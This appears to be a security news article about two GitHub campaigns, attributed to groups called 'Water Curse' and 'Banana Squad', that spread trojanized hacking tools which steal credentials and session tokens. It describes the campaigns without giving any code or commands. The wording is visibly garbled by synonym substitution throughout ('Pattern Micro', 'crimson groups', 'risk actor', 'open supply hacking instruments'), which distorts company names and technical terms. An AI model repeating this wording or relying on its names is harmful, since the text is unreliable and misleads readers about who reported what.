Safety researchers at Pattern Micro and ReversingLabs have uncovered two recent campaigns focusing on crimson groups, novice cybercriminals, and developer environments through trojanized open supply hacking instruments.
Attributed by Pattern Micro to a risk actor named Water Curse, one of many campaigns concerned at the least 76 GitHub accounts linked to repositories that had malicious payloads injected into construct scripts and challenge recordsdata.
The payloads have been designed to steal credentials, browser knowledge, and session tokens, in addition to to offer the risk actor with persistent distant entry to the compromised programs.
In response to Pattern Micro, Water Curse is a financially motivated adversary that seemingly started utilizing GitHub accounts for nefarious actions in March 2023.
“Water Curse primarily targets crimson groups and penetration testers, builders, and avid gamers, reflecting a hybrid technique that blends provide chain compromise with opportunistic exploitation throughout digital communities,” the cybersecurity agency notes.
The risk actor hid the malicious payloads within the Visible Studio challenge configuration recordsdata of an SMTP e mail bomber and Sakura RAT. Instruments employed all through the marketing campaign embrace C#, JavaScript, PowerShell, and VBS scripts, and compiled PE binaries.
ReversingLabs has uncovered a marketing campaign involving greater than 67 GitHub repositories promising Python-based hacking instruments, however delivering trojanized look-alikes of different repositories.
As a part of the marketing campaign, attributed to a risk actor named Banana Squad, every GitHub account had just one repository listed underneath its identify, suggesting that malware distribution was the only goal of each one in every of them.Commercial. Scroll to proceed studying.
The marketing campaign started in early June, however ReversingLabs linked it to earlier stories on comparable malicious exercise flagged by Checkmarx in 2023.
Each incidents mirror a marketing campaign lately uncovered by Sophos, which seems linked to a distribution-as-a-service (DaaS) operation that has been ongoing since 2022, and which has used 1000’s of GitHub accounts to distribute malware embedded in open supply instruments.
Associated: Malicious NPM Packages Disguised as Categorical Utilities Permit Attackers to Wipe Techniques
Associated: Cyber Insights 2025: Open Supply and Software program Provide Chain Safety
Associated: Open Supply Bundle Entry Factors Could Result in Provide Chain Assaults
